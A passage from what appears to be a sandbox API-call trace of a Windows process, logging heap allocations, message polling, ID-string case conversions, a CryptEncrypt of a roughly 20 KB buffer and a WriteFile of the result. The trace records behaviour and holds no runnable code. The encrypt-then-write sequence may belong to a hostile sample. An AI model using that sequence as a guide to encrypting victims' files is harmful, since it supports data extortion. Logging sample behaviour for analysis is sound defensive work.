lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.832] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.832] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0220.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74508 | out: hHeap=0x2af0000) returned 1 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0220.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0220.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0220.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0220.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0220.837] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab818 [0220.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0220.838] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0220.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a98b98 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0220.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0220.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0220.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.841] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4e15, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4e18) returned 1 [0220.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.842] CharLowerBuffW (in: lpsz="byte[19992]", cchLength=0xb | out: lpsz="byte[19992]") returned 0xb [0220.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.843] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.843] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.843] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.843] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.843] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.843] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabbf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.843] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a98b98*, pdwDataLen=0x8cef60*=0x4e15, dwBufLen=0x4e18 | out: pbData=0x2a98b98*, pdwDataLen=0x8cef60*=0x4e18) returned 1 [0220.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.844] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.844] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.844] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.844] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.844] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.844] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.845] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.845] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.845] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.845] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.845] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.845] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.845] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.845] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.845] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.845] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.845] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.850] WriteFile (in: hFile=0x524, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x4e18, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x4e18, lpOverlapped=0x0) returned 1 [0220.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.851] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0220.851] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.851] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0220.851] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.851] PeekMessageW 